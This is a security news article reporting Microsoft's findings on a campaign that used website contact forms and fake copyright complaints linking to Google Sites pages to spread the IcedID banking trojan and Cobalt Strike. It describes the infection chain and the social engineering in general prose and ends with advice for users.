Posted on April 13, 2021 at 6:54 PM
Microsoft has discovered that some threat actors are planting IcedID inform-stealing banking trojans using companies’ website contact forms. According to the warning, the attackers are evading email spam filters by submitting web-based “contact us” forms.
The threat actors are also utilizing Google URLs to spread the Trojan, according to Microsoft researchers.
The messages continually mention copyright infringement by a designer, an illustrator, or a photographer. They purportedly contain links “evidence” for the legal infractions. But in reality, the link links directly to the Google page that downloads IcedID, a loader, and an information stealer for other malware.
The messages use urgent and strong language, pressurizing the recipient to act swiftly and cajoling them to click on the supposed legal action.
The Microsoft researchers discovered that the threat actors utilized fake names that begin with “Mel”, such as “Meleena” or “Melanie” to deceive the users.
The links redirect the victims to the sites.google.com page which directs them to sign in to the page. After the user signs in, a malicious .ZIP file is automatically downloaded. It contains unpacked .JS files that are heavily obfuscated, according to the researchers.
They added that the .JS file is executed through WScript, which generates a shell object that delivers PowerShell and downloads the IcedID payload as a .DAT file.
The file has a Cobalt Strike beacon that looks like a stageless DLL, which gives the threat actors remote control of the user’s system. The Cobalt Strike generally delivers beacons for the detection of network bugs. When it is utilized for its purpose, it can stimulate an attack. But hackers are now taking advantage of its usability and re-turning it against networks.
The threat actors also delivered secondary payloads
According to the Microsoft analysis, the downloaded . DAT file is loaded through the rundll32 executable. When the download is complete, it establishes different information-gathering commands, including delivering SQLite for accessing banking databases, getting system and domain details, and getting the IP addresses of the targets.
When it is run, IcedID links to a command-and-control server (C2) that downloads modules that capture and exfiltrate banking credentials as well as other information, Microsoft said.
By scheduling tasks, it achieves persistence and downloads implants such as Cobalt Strike and other tools, which enables the remote attackers to execute malicious codes on the compromised system.
The Microsoft researchers also noted that the Trojan enables the threat actors to deliver secondary payloads, mote around the system in search of important data, and collect additional credentials.
The campaign has also organized a secondary attack campaign, which the threat actors want to utilize in case the original sites.google page is taken down.
The targets are directed to the main domain in the secondary chain. Additionally, the researchers revealed that there are malicious sites.google links in the forms delivered to the users, which downloads the IcedID malware.
The increasing spate of social engineering campaigns
The social engineering method has been at play here once again. In this case, the attackers used forms on websites to enable the campaign scale through email spam filters, according to the researchers.
The malicious email looks particularly genuine, which makes it easier to convince the user. It looks trustworthy because it was sent directly from genuine email marketing systems, which makes it easier to evade detection.
“The email templates match what they would expect from an actual customer interaction or inquiry,” the researchers stated.
Also, the use of sign-in requests and a Google page enabled the threat actors to evade detection.
Other IcedID campaign activities were recently observed by researchers, and this adds to a growing number of such campaigns.
Last week, Uptycs researchers pointed out that they discovered series of email campaigns that utilize Microsoft Excel spreadsheet file attachments. Other similar campaigns also use different types of social engineering methods to trick their victims and evade detection.
Security researchers have warned about the effectiveness of such campaigns since they are hardly stopped by antiviruses and malware prevention software. As a result, users are asked to protect their systems by staying alert and refusing to open links. Even if they feel the site is genuine, they should rather type the address of the site if they need to check out the site, the security researchers advised.